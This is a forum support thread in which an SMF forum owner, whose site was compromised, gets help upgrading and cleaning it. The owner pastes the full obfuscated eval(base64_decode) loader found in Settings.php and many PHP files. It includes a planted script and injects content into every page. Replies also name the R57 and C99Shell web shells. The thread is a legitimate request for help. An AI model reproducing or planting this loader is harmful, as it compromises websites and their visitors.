new forum with old data

[cafecommk]

Can I install a new version (2.0) on a different location and than copy the users and everything else from the old one (1.1...)?

[H]

Easiest thing to do is restore the 1.1 files and database and then overwrite the 2.0 upgrade package over it and then run upgrade.php

[Xylar2]

No, he means can he use the same SQL database for a new forum. So he doesn't lose all his posts/members/settings.

[H]

I know . But as attachments and avatars probably will probably need to be preserved it is easiest just to copy EVERYTHING

[cafecommk]

I see. But ...how can i clean infiltrations. i have found one folder so far that has files someone else has put there (like ads for medicine or similar). I am afraid they don't get in again.

thanks

[Neorics]

I suggest upgrading to just 1.1.8 then and not 2.0 cause I think 1.1.8 is more secured at the moment.

Then just delete that folder and make sure to set the file permissions to Only the Standard files are writable in the Admin>Packages>Options

[H]

2.0 and 1.1.x are both equally covered regarding security updates.

Easiest thing to do then is ensure attachments/ is copied from the old server as well as settings.php. Then upload the upgrade archive and run update.php

[cafecommk]

when i run the upgrade....would it overwrite the folders that the forum does not need (the infiltrations)?


Thank You H for Your help

[Antechinus]

The unwanted code will be in your files and they will be overwritten by the new files so yes, it should wipe that code.
The only way this would not work is if the injected code is in Settings.php, but you can check that file yourself.

[cafecommk]

This is huge help for me. thanks.
the code i did find is in
/forum/mambots/editors/tinymce/jscripts/tiny_mce/plugins/media/images/paste/jscripts

i was scared if there were more.
i will check the setings.php

thank you tonnes


edit: My version of smf is:
* Software Version:           SMF 1.1.2   

I also have in the first line of the file settings.php:   /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS92aXN0aW5hYy9wdWJsaWNfaHRtbC9jYWZlL2ZvcnVtL21hbWJvdHMvZWRpdG9ycy90aW55bWNlL2pzY3JpcHRzL3RpbnlfbWNlL3BsdWdpbnMvbWVkaWEvaW1hZ2VzL3Bhc3RlL2pzY3JpcHRzL2NvcHBlci5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS92aXN0aW5hYy9wdWJsaWNfaHRtbC9jYWZlL2ZvcnVtL21hbWJvdHMvZWRpdG9ycy90aW55bWNlL2pzY3JpcHRzL3RpbnlfbWNlL3BsdWdpbnMvbWVkaWEvaW1hZ2VzL3Bhc3RlL2pzY3JpcHRzL2NvcHBlci5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ=='));   

I guess this is a hack? And I have it in many files
Any advises on how to proceed?

[N3RVE]

Yes, that looks like a hack.
The Large Upgrade package will overwrite all files excluding Settings.php and Settings_bak.php, seeing that both files contain sensitive information that should *not* be viewable on a public forum such as this one, you should try to clean it yourself, see a default one to see what is needed and read the comment lines, If you can't, E-mail me a copy so I can clean it up for you or build a new one using the connection combination from the hacked copy, the most important variables are $db_server, $db_name, $db_username and $db_passwd

-[n3rve]

[cafecommk]

please tell me how to send You the file.

Thanks a billion

i sent you an email, but can't attach.

[N3RVE]

ralph[at]simplemachines.org
Note that I won't be able to attend to this in the next hour or two, I'm currently mobile

-[n3rve]

[N3RVE]

(Got your PM)
Downloaded the file and replied, yeah, that file has some code that isn't needed, I'll cllean it when I return to a PC, post my findings here and send you a sanitized copy

-[n3rve]

[cafecommk]

This is what i did. I created a new folder /forum
Copied everything in it.
Uploaded large upgrade package-clicked yes to overwrite
uploaded the file settings.php (after I have deleted the top eval line)
and i check if it is ok. when i ran the cafe.mk/forum    nothing happened. blank screen. I checked the files and i see the line eval still is there in all my php files
and just before i started crying i got the pm from you and got hope back.
this is printscreen of the forum folder. i think i have too many folders in there


I am waiting for instructions.

I am thinking how noble it is to help people even on the mobile


edit: this is available to me:  http://cafe.mk/forum/upgrade.php  maybe it will fix things:)

[cafecommk]

Thank You [n3rve]  for all the help yesterday and sorry for the trouble.
I can not explain how You fixed the problem , but I know I gave You too much trouble.

I deleted most of the files unneeded so it should be ok now. The forum is working, I will try and fix things one at a time. But I really need You to tell me how did You make the text readable in cyrilic. Do I have to change in the database...or...?

Thanks again

the forum is at cafe.mk/forum

[N3RVE]

Nothing was done to make the chars readable, after extracting and merging all those tables, everything worked. It seems we'll have to go through all that stress to get the forum working again, so you have to create a new database and import the backup I asked you to download yesterday.
When I get online, I'll add the other tables and then we can establish connection between the database and fresh SMF files.

Before we do this, Please, ensure that you have deleted / taken of the server, all uneeded files and updated all other softwares on the server. Also change all access passwords, 'cos we don't know how that hacker is getting in. When that is done, I'll fix it again.
Note: I won't be able to fix 'til tomorrow

-[n3rve]

[cafecommk]

i suggest we give it a few days to see if i get any problems. I would not want to fix it and than someone destroy it again. i think i cleaned it all, but still would not risk.
I will get back to you in a few days. Thank you for reconsidering.

[cafecommk]

Hello,
It's been a few days and no strange activities on the server. so i think it is safe to go on. i check a lot of the folders and can not notice anything weird.
I would like to fix the forum if you could help me whenever you are online maybe tommorow night (in 24 hours) or saturday morning.

Anyway i posted for help on security and i got following:
http://forums.digitalpoint.com/showthread.php?t=1230788


Your website was exploited using a remote javascript exploit.

Then the PHP Based trojan R57.PHP and C99Shell.php were installed on your server.

I can secure your server and place detection systems to alert you who is doing it also when and where the hack attempt is taking place.

For the time this would take i'd only charge $30 and have this done within about 30 mins to one hour.



different one

I can do this repair for $15.

Quote:
Originally Posted by cafecommk
Quote:
Originally Posted by 3roken
Your website was exploited using a remote javascript exploit.

Then the PHP Based trojan R57.PHP and C99Shell.php were installed on your server.

I can secure your server and place detection systems to alert you who is doing it also when and where the hack attempt is taking place.

For the time this would take i'd only charge $30 and have this done within about 30 mins to one hour.
thank you for your sincere offer. i am considering it. I will let you know when i decide to.
thank you
Forward Message



different person
Hi cafe, plz tell your site. If your site is non-commercial or non-business, I can give you a free security scan. What you give me back is you authorize me for security testing and testimonial that I've pentested your site.

second leter
Re: plz tell your site
that you authorize me is

- You allow me to perform security testing

You'll have to verify the site ownership by placing

- allow-yehg.net file at your root folder.



thank you much

[cafecommk]

Hello again. I have everything ready for whenever You get the time. The account is clean and the site is up. I can not go on on my own because we were interupted in the middle of fixing things. I do not know what was going on.
Please get in touch with me anytime that fits you

thank you